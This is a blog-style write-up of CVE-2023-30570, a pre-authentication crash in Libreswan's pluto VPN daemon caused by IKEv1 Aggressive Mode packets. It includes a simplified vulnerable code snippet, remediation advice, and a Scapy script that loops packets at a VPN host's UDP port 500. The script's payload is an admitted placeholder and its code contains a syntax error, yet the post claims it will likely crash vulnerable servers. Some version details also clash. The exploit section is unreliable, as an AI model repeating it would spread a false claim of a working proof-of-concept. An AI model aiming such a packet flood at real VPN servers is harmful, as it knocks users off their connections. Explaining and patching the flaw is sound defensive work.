CVE-2023-30570 - Crashing Libreswan Pluto with Unauthenticated Aggressive Mode IKEv1 Packets

Libreswan is one of the most popular open source implementations of IPsec and IKE protocols used for virtual private networks (VPNs) on Linux. If you use VPNs, you may well be depending on Libreswan—even indirectly—due to its inclusion in many distributions. In 2023, researchers discovered a significant vulnerability (CVE-2023-30570) in the core of Libreswan, called "pluto", which could lead to denial of service and a crash of the VPN daemon itself.

In this post, I’ll break down what went wrong, explain how the exploit works, include code snippets that highlight the vulnerable logic, and even show how an attacker could trigger this bug. The aim here is to make it straightforward, even if you’re not a deep protocol expert.

What is CVE-2023-30570?

CVE-2023-30570 is a vulnerability in Libreswan’s pluto daemon, present in all versions from 3.28 up to (but not including) 4.11. The bug can be exploited using IKEv1 Aggressive Mode packets, and—worse—no authentication is required.

In simple terms: An attacker can send specially crafted IKEv1 packets over the network, and that alone is enough to crash the whole pluto process, likely killing all VPN connections the server is hosting. That’s a textbook Denial of Service (DoS) attack.

How Does The Exploit Work?

IKE (Internet Key Exchange) protocol is how VPN endpoints negotiate secure connections. In Aggressive Mode (generally discouraged now in favor of Main Mode), things are fast and not so secure. Pluto maintains “SPI” (Security Parameters Index) values to keep track of requests and responses.

The bug in Libreswan’s pluto arises during the handling of IKEv1 Aggressive Mode packets when pluto mishandles its responder SPI values. When an attacker abuses this by sending a series of unauthenticated packets that confuse pluto about its SPIs, it leads to a pointer dereference of a wrong or null object, causing a crash.

Here’s a simplified version

1. Attacker sends malicious packets: Repeated unauthenticated Aggressive Mode packets are sent with carefully chosen SPI values.
2. Pluto mishandles SPI state: Due to a missing check in the pluto code, the daemon references freed or invalid memory.

Code Snippet: The Vulnerable Code

This snippet is simplified to show where things go wrong. (From pluto’s packet handling in IKEv1 Aggressive Mode):

// In ikev1_aggressive mode packet handling
struct state* st = find_state_by_responder_spi(receiver_spi);
if (st == NULL) {
    // Normally, this would be a benign scenario.
    // But due to mishandling, later code assumes st is valid!
}

... 

// Later in the same function, accesses 'st' blindly
send_notification(st, ...);  // Oops, st may be NULL!

If st is NULL (not found), but code continues to use it as though it’s valid, the process can crash.

Proof-of-Concept Exploit (PoC)

Though we won’t give a full attack toolkit, here’s a simple Python script leveraging Scapy to demonstrate how an attacker could send malformed IKEv1 Aggressive Mode packets to a Libreswan VPN server:

from scapy.all import *

# Set target IP and port
target = "vpn.example.com"
port = 500  # IKE uses UDP 500

# Construct IKEv1 Aggressive Mode packet with arbitrary SPI
ikev1_packet = (IP(dst=target)/UDP(dport=port)/Raw(
    # This payload would normally be crafted according to IKEv1's format,
    # with an aggressive mode SPI that triggers the bug
    b"\x01\x10" + b"\x00" * 26  # (fake header+body for demonstration)
))

# Send packets in a loop, as the bug may require repeated triggers
for i in range(20):
    send(ikev1_packet, verbose=)
    print(f"Sent packet {i+1}")

This won’t work against fixed versions (>4.11), but will likely crash pluto on vulnerable instances.

Remote Denial of Service: Any attacker on the internet can crash your VPN.

- No Authentication Required: It’s a *pre-auth* attack, so even unregistered users can take down your service.
- Wide Reach: Any Linux/BSD box running Libreswan 3.28 to 4.10 is vulnerable by default if IKEv1 is enabled.

Remediation

Simple: Upgrade!

In /etc/ipsec.conf add

ikev1=never

And reload/restart the service.

More Information & References

- Libreswan CVE-2023-30570 Security Advisory (official)
- NVD Entry for CVE-2023-30570
- Mitre CVE Details

Conclusion

CVE-2023-30570 is a critical issue in Libreswan’s pluto handling of IKEv1 Aggressive Mode, letting anyone on the network bring down your VPN server with ease. The only defense is to update your software—now—or turn off IKEv1 support altogether. As always, keep those VPN endpoints patched, and avoid insecure protocol modes like Aggressive wherever possible.

If you found this useful, consider checking your infrastructure for old VPN stacks—the internet never sleeps, and neither do attackers!

Timeline

Published on: 05/29/2023 00:15:00 UTC
Last modified on: 06/03/2023 04:12:00 UTC